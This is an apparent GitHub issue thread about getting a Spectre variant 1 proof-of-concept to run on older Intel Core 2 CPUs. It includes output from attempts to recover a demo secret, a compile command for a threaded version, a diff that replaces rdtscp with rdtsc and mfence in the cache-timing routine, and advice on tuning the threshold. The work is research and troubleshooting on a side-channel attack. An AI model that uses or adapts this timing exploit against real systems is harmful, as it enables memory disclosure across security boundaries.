illegal hardware instruction

[kopr12]

Getting error running this in linux on dual core cpu :

Putting 'The Magic Words are Squeamish Ossifrage.' in memory
Reading 40 bytes:
illegal hardware instruction

$ cat /proc/cpuinfo
..
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Pentium(R) Dual  CPU  E2180  @ 2.00GHz
..

[Eugnis]

Hello. Try this implementation with pthread.h https://gist.github.com/Eugnis/3ba3f048988e7be76737ab87da64bb26
Compile gcc -std=c99 -march=native -pthread -O0 spectre-thread.c -o spectre && ./spectre

[kopr12]

Thank you, this one works.

I don't know if the result is good though, I mean the message isn't recovered, so that's good but now I wonder why.

CACHE_HIT_THRESHOLD = 40
          MAX_TRIES = 2500

          Size of secret is 41
Size of recovered_secret is 41

 Original secret: 'The Magic Words are Squeamish Ossifrage.'
Recovered secret: ''

Reading 40 bytes:
Reading at malicious_x = 0xa0... Unclear: 0xB4=’?’ score=2492 (’?|?’ second: 0x0D=’?’ score=2274)
Reading at malicious_x = 0xa1... Unclear: 0xB4=’?’ score=2477 (’?|?’ second: 0x0D=’?’ score=2239)
Reading at malicious_x = 0xa2... Unclear: 0xB4=’?’ score=2485 (’?|?’ second: 0x9D=’?’ score=2261)
Reading at malicious_x = 0xa3... Unclear: 0xB4=’?’ score=2477 (’?|?’ second: 0x9D=’?’ score=2242)
Reading at malicious_x = 0xa4... Unclear: 0xB4=’?’ score=2482 (’?|?’ second: 0x0D=’?’ score=2221)
Reading at malicious_x = 0xa5... Unclear: 0xB4=’?’ score=2479 (’?|?’ second: 0x9D=’?’ score=2262)
Reading at malicious_x = 0xa6... Unclear: 0xB4=’?’ score=2472 (’?|?’ second: 0x9D=’?’ score=2240)
Reading at malicious_x = 0xa7... Unclear: 0xB4=’?’ score=2484 (’?|?’ second: 0x9D=’?’ score=2258)
Reading at malicious_x = 0xa8... Unclear: 0xB4=’?’ score=2478 (’?|?’ second: 0x9D=’?’ score=2306)
Reading at malicious_x = 0xa9... Unclear: 0xB4=’?’ score=2479 (’?|?’ second: 0x0D=’?’ score=2251)
Reading at malicious_x = 0xaa... Unclear: 0xB4=’?’ score=2478 (’?|?’ second: 0x9D=’?’ score=2254)
Reading at malicious_x = 0xab... Unclear: 0xB4=’?’ score=2480 (’?|?’ second: 0x9D=’?’ score=2229)
Reading at malicious_x = 0xac... Unclear: 0xB4=’?’ score=2481 (’?|?’ second: 0x9D=’?’ score=2240)
Reading at malicious_x = 0xad... Unclear: 0xB4=’?’ score=2476 (’?|?’ second: 0x9D=’?’ score=2249)
Reading at malicious_x = 0xae... Unclear: 0xB4=’?’ score=2473 (’?|?’ second: 0x0D=’?’ score=2247)
Reading at malicious_x = 0xaf... Unclear: 0xB4=’?’ score=2479 (’?|?’ second: 0x9D=’?’ score=2244)
Reading at malicious_x = 0xb0... Unclear: 0xB4=’?’ score=2478 (’?|?’ second: 0x0D=’?’ score=2241)
Reading at malicious_x = 0xb1... Unclear: 0xB4=’?’ score=2470 (’?|?’ second: 0x0D=’?’ score=2240)
Reading at malicious_x = 0xb2... Unclear: 0xB4=’?’ score=2477 (’?|?’ second: 0x0D=’?’ score=2246)
Reading at malicious_x = 0xb3... Unclear: 0xB4=’?’ score=2480 (’?|?’ second: 0x0D=’?’ score=2221)
Reading at malicious_x = 0xb4... Unclear: 0xB4=’?’ score=2482 (’?|?’ second: 0x0D=’?’ score=2256)
Reading at malicious_x = 0xb5... Unclear: 0xB4=’?’ score=2477 (’?|?’ second: 0x9D=’?’ score=2264)
Reading at malicious_x = 0xb6... Unclear: 0xB4=’?’ score=2481 (’?|?’ second: 0x9D=’?’ score=2241)
Reading at malicious_x = 0xb7... Unclear: 0xB4=’?’ score=2471 (’?|?’ second: 0x9D=’?’ score=2248)
Reading at malicious_x = 0xb8... Unclear: 0xB4=’?’ score=2482 (’?|?’ second: 0x0D=’?’ score=2233)
Reading at malicious_x = 0xb9... Unclear: 0xB4=’?’ score=2486 (’?|?’ second: 0x9D=’?’ score=2262)
Reading at malicious_x = 0xba... Unclear: 0xB4=’?’ score=2486 (’?|?’ second: 0x9D=’?’ score=2282)
Reading at malicious_x = 0xbb... Unclear: 0xB4=’?’ score=2480 (’?|?’ second: 0x9D=’?’ score=2248)
Reading at malicious_x = 0xbc... Unclear: 0xB4=’?’ score=2482 (’?|?’ second: 0x0D=’?’ score=2236)
Reading at malicious_x = 0xbd... Unclear: 0xB4=’?’ score=2473 (’?|?’ second: 0x9D=’?’ score=2255)
Reading at malicious_x = 0xbe... Unclear: 0xB4=’?’ score=2472 (’?|?’ second: 0x9D=’?’ score=2245)
Reading at malicious_x = 0xbf... Unclear: 0xB4=’?’ score=2471 (’?|?’ second: 0x0D=’?’ score=2244)
Reading at malicious_x = 0xc0... Unclear: 0xB4=’?’ score=2485 (’?|?’ second: 0x9D=’?’ score=2222)
Reading at malicious_x = 0xc1... Unclear: 0xB4=’?’ score=2481 (’?|?’ second: 0x9D=’?’ score=2240)
Reading at malicious_x = 0xc2... Unclear: 0xB4=’?’ score=2478 (’?|?’ second: 0x0D=’?’ score=2243)
Reading at malicious_x = 0xc3... Unclear: 0xB4=’?’ score=2479 (’?|?’ second: 0x9D=’?’ score=2271)
Reading at malicious_x = 0xc4... Unclear: 0xB4=’?’ score=2475 (’?|?’ second: 0x0D=’?’ score=2244)
Reading at malicious_x = 0xc5... Unclear: 0xB4=’?’ score=2478 (’?|?’ second: 0x0D=’?’ score=2238)
Reading at malicious_x = 0xc6... Unclear: 0xB4=’?’ score=2482 (’?|?’ second: 0x0D=’?’ score=2233)
Reading at malicious_x = 0xc7... Unclear: 0xB4=’?’ score=2479 (’?|?’ second: 0x9D=’?’ score=2251)
counter thread finished

 Original secret: 'The Magic Words are Squeamish Ossifrage.'
Recovered secret: '????????????????????????????????????????'

[Eugnis]

Try to change the CACHE_HIT_THRESHOLD value on line 29. While a value of 80 appears to work for most desktop CPUs, a larger value may be required for slower CPUs.

Btw, Intel(R) Pentium(R) Dual CPU E2180 can be not affected. It's not present in Intel affected CPUs list

[kopr12]

I tried with several different values and it produced some chars instead of '?' but I was not able to get original message, I'll try later to run it in some kind of loop which would change threshold automatically.

Maybe core2 isn't affected but AFAIK all cpu's are affected by Spectre.

Meltdown :

More technically, every Intel processor which implements out-of-order execution is potentially affected, which is effectively every processor since 1995 (except Intel Itanium and Intel Atom before 2013).

Spectre :

Spectre, on the other hand, appears to have a much wider reach. According to researchers, nearly every type of device is affected by Spectre; it has been verified to work across Intel, AMD, and ARM processors. Spectre is harder to exploit than Meltdown, but researchers caution that it is also harder to guard against.

https://www.windowscentral.com/all-modern-processors-impacted-new-meltdown-and-spectre-exploits

[pali]

Here is alternative patch for machines which do not have rdtscp instruction and crash on illegal hardware instruction:

diff --git a/Source.c b/Source.c
index ad95166..4fb7918 100644
--- a/Source.c
+++ b/Source.c
@@ -8,6 +8,10 @@
 #include <x86intrin.h> /* for rdtscp and clflush */
 #endif
 
+#ifndef HAVE_RDTSCP
+#define HAVE_RDTSCP 1
+#endif
+
 /* sscanf_s only works in MSVC. sscanf should work with other compilers*/
 #ifndef _MSC_VER
 #define sscanf_s sscanf
@@ -81,9 +85,16 @@ void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2])
 		{
 			mix_i = ((i * 167) + 13) & 255;
 			addr = &array2[mix_i * 512];
+#if HAVE_RDTSCP
 			time1 = __rdtscp(&junk); /* READ TIMER */
 			junk = *addr; /* MEMORY ACCESS TO TIME */
 			time2 = __rdtscp(&junk) - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
+#else
+			time1 = __rdtsc(); /* READ TIMER */
+			junk = *addr; /* MEMORY ACCESS TO TIME */
+			_mm_mfence();
+			time2 = __rdtsc() - time1; /* READ TIMER & COMPUTE ELAPSED TIME */
+#endif
 			if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
 				results[mix_i]++; /* cache hit - add +1 to score for this value */
 		}

rdtsc is used also by meltdown attack example.

[kopr12]

Your patch have some problems to apply but simply replacing rdtscp(&junk) with rdtsc() works indeed, I'll leave this open and @Eugnis can close it if he decides to implement this or whenever.

Edit: Actually it doesn't always work, I mean program runs but I only once got the original message, other times I got random chars.

[pali]

Your patch have some problems to apply

Make sure you handle CRLF and LF correctly.

simply replacing rdtscp(&junk) with rdtsc() works

Do not forget for _mm_mfence or any other synchronization instruction (e.g. cpuid) as rdtsc can be executed out-of-order, e.g. prior to junk = *addr. rdtscp is "safe" variant of rdtsc.

[kopr12]

With _mm_mfence I get worse results, usually it's just '?' , commenting that line out produces some chars of the original message.

btw meltdown attack example works fine on core2 cpu's.

[WiredLife]

On my Core2Quad's i dont get letters from the stored string.